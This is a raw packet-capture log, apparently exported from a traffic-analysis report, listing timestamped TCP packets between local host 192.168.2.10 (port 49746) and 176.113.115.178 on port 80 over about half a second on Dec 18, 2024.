                                                        Dec 18, 2024 14:08:22.462038040 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.462387085 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.462435007 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.462446928 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.463382959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.463479996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.463536024 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.464401007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.464787960 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.584019899 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.584146976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.584242105 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.584594965 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.584721088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.585109949 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.585607052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.585731983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.585783958 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.586568117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.586946964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.586960077 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.587038994 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.588064909 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.588077068 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.588129997 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.588974953 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.588988066 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.589019060 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.589997053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.590061903 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.590132952 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.591049910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.591133118 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.591541052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.592109919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.592168093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.592195034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.593139887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.593182087 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.593240976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.595179081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.595278978 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.595468998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.595498085 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.595510006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.595602989 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.596613884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.596632004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.596736908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.597280979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.597335100 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.597440004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.598362923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.598375082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.598469019 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.599347115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.599436998 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.599462032 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.600416899 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.600498915 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.600509882 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.601442099 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.601537943 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.601670027 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.602442026 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.602456093 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.602643013 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.603526115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.603616953 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.603631973 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.604583979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.604612112 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.604628086 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.605511904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.605602980 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.605629921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.606553078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.606678009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.606719971 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.607620001 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.607671022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.607717037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.608650923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.608767986 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.608803988 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.609755993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.609769106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.609812975 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.610728979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.610780001 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.610830069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.611952066 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.611963987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.612057924 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.612857103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.612962008 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.613002062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.613800049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.613867998 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.613938093 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.614845991 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.614914894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.614938974 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.615853071 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.616019964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.616085052 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.616992950 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.617089033 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.617172003 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.617974997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.618091106 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.618113995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.619559050 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.619602919 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.619760990 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.619996071 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.620157957 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.620165110 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.621062040 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.621146917 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.621282101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.622562885 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.622694969 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.622720003 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.623423100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.623564959 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.623825073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.624322891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.624381065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.624387980 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.625320911 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.625338078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.625413895 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.626199007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.626261950 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.626282930 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.627269983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.627331018 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.627358913 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.628314972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.628390074 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.628413916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.629336119 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.629347086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.629398108 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.630290985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.630394936 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.630460978 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.631433010 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.631480932 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.631494045 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.632373095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.632500887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.632560015 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.633405924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.633477926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.633539915 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.634468079 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.634531021 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.653877020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.653945923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.654304981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.654493093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.654522896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.654633045 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.655355930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.655508995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.656369925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.656454086 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.776022911 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.776135921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.776213884 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.776408911 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.776568890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.776921034 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.777388096 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.777399063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.777465105 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.778407097 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.778419971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.778474092 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.779150009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.779366016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.779412031 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.780200958 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.780337095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.780467987 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.781224012 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.781337023 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.781486034 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.782238960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.782327890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.782599926 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.783308029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.783454895 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.783504009 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.784354925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.784562111 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.784843922 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.785331964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.785557032 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.785640001 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.786355972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.786483049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.786528111 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.787434101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.787555933 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.787626982 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.788532972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.788615942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.788652897 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.789530993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.789541960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.789699078 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.790709972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.790801048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.791019917 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.791541100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.791687012 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.791728973 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.792632103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.792644024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.792746067 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.793632984 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.793646097 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.793746948 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.794646978 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.794816017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.795118093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.795757055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.795941114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.795978069 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.796825886 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.796897888 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.796994925 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.797744036 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.797832012 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.798086882 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.798865080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.798973083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.799045086 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.799819946 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.799935102 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.800198078 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.800875902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.801000118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.801054001 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.801886082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.801991940 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.802165031 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.802927971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.803112030 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.803208113 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.803940058 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.804126024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.804336071 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.804955006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.805083036 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.805135012 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.806008101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.806253910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.806318045 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.807020903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.807167053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.807233095 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.808132887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.808291912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.808348894 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.809075117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.809223890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.809286118 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.810147047 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.810292006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.810369015 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.811130047 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.811249971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.811889887 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.812164068 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.812279940 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.812382936 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.813240051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.813251972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.813360929 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.814239025 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.814327002 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.814444065 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.815357924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.815458059 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.815510988 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.816432953 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.816488981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.816541910 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.817352057 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.817466974 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.817586899 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.818519115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.818603039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.818645954 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.819442987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.819560051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.819606066 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.820460081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.820585012 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.820729971 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.821521997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.821742058 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.821847916 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.822577000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.822782040 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.822913885 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.823656082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.823909998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.823987961 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.824563980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.824731112 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.824799061 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.825625896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.825803041 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.825918913 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.826663971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.846128941 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.846148014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.846211910 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.846314907 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.846494913 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.846508980 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.847309113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.847383022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.847413063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.848359108 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.848407984 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.848478079 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.896754980 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.968183041 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.968198061 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.968269110 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.968708992 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.968787909 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.968843937 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.969820023 CET8049746176.113.115.178192.168.2.10
